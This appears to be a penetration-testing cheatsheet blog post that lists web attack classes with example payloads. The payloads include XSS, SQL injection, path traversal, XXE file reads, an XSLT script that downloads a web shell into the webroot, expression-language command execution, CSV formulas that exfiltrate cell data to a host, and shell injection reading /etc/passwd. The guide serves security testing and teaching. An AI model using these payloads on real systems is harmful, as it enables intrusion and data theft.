Web app penentration testing checklist and cheatsheet (with examples)

It’s always handy to have a good checklist when it comes to web app pen-testing. It’s even better to have some examples for each case 🙂

We’ll start with more “general” cases and then dig deeper into some obscure or language dependent attacks.

Glossary

XSS (Cross-site scripting)

CSS(Cascading Style Sheet) injection

Format string attack

Directory traversal

SQL injection

SSJSI

XXE (Xml eXternal Entity)

XXE C# remote code execution

Deserialization

Expression Language Injection

Insecure direct object access

Open redirect

HTTP content splitting

CSRF (Cross-site request forgery)

CORS (Cross-origin resource sharing)

Check if tokens are removed at logout

Change HTTP Referer

Truncate file names

CSV injection

Code execution

Examples

XSS (Cross-site scripting)

<svg onload=alert(1)>
<svg/onload=alert(1)>
<img src=x123 onerror=confirm(1)>
onmousemove="prompt(1);"

CSS (Cascading Style Sheet) injection

When a CSS file is imported into the page, check for the absence of a leading “/” character.

Here is an example:

<link href="styles.css" ...

More details here and here.

Format string attack

%d%d%d……%d
%n%n%n……%n
%lf%lf%lf……%lf
%s%s%s……%s
%x%x%x……%x

Directory traversal

../ ../ ... /etc/ passwd
../ ../ ... /windows/ system.ini

SQL injection

' or "1"='1
" or '1'="1
" OR SLEEP(5000) --
' OR SLEEP(5000) --
" OR WAITFOR DELAY '00:00:05' --
' OR WAITFOR DELAY '00:00:05' --
...

SSJS injection

res.end('malwrforensics')
res.end(require('fs').readFileSync('/etc/ passwd'))

XXE (Xml eXternal Entity)

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc / passwd" >]>
<foo>&xxe;</foo>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds><user>&xxe;</user>
<pass>mypass</pass></creds>

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://malwrforensics.com/scripts/hex_to_bin.txt" >]>
<foo>&xxe;</foo>

XXE C# remote code execution

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://test.com/testnamespace">
<msxsl:script language="C#" implements-prefix="user">
<![CDATA[
public string xml()
{
    System.Net.WebClient webClient = new System.Net.WebClient();
    webClient.DownloadFile("https://x.x.x.x/shell.aspx",
                       @"c:\inetpub\wwwroot\shell.aspx");

    return "It works!";
}
]]>
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml()"/>
</xsl:template>
</xsl:stylesheet>

More details here.

Deserialization

Java

This is a great resource (and cheat sheet).

.NET:

AAEAAAD/////...

More details here and here.

Expression Language Injection

T(java.lang.Runtime).getRuntime().exec(“calc.exe”)

More details here.

Insecure direct object access

If an object is referenced by an ID, check if you can access other objects that aren’t exposed (objects you aren’t supposed to have access to).

Example: https://web.site/downloadfile?id=12345
Check other objects with different IDs (..,12344, 12346,..)

Open redirect

This usually happens when one of the parameters in a form points to an URL.

Example: https://web.site/doCmd?id=1&url=http://web.site/page
You can change the url to point to another (phishing/malicious) website.

Can be used to bypass some content filtering systems, especially if used in conjunction with an URL shortening service.

HTTP content splitting

Inject CR/LF (\r\n) in the HTTP headers (for example if you control a cookie value).

More details here.

CSRF (Cross-site request forgery)

Check for the presence of tokens with random values in forms. Especially forms that will change a password, edit an address/order/.., etc.

CORS (Cross-origin resource sharing)

Set the “Origin” in the HTTP header to a website you control. For example, it can be useful to steal CSRF tokens.

curl -H "http://malwrforensics.com" http://<yourwebsite>

Check if you receive 
"Access-Control-Allow-Origin: http://malwrforensics.com" or 
"Access-Control-Allow-Origin: *"

More details here.

Check if tokens are removed at logout

Check if the tokens and cookies are still valid if you logoff. Use a proxy to get the cookies/parameters and then iterate through them and check if they are still valid.

Change HTTP Referer

Use a proxy (Burp/ZAP/etc) to intercept and change the Referer field. Look for errors.

Truncate file names

Add %00 or %0D%0A when doing GET/POST requests for files.

CSV injection

Add something like one of the following in the fields in the csv file.

"=1+1+cmd|' /C calc'!A0"
"=IMPORTXML("http://web.server?p="", "//a")"
"=IMPORTXML("http://web.server?p=", "//a/@href")"

=HYPERLINK("http://web.server?leak="&A1&A2,
"Error: please click here")  
This will show an error and when the user clicks on it, 
the contents of A1 and A2 fields will be exfiltrated.

Code execution

; cat /etc/ passwd
& dir c: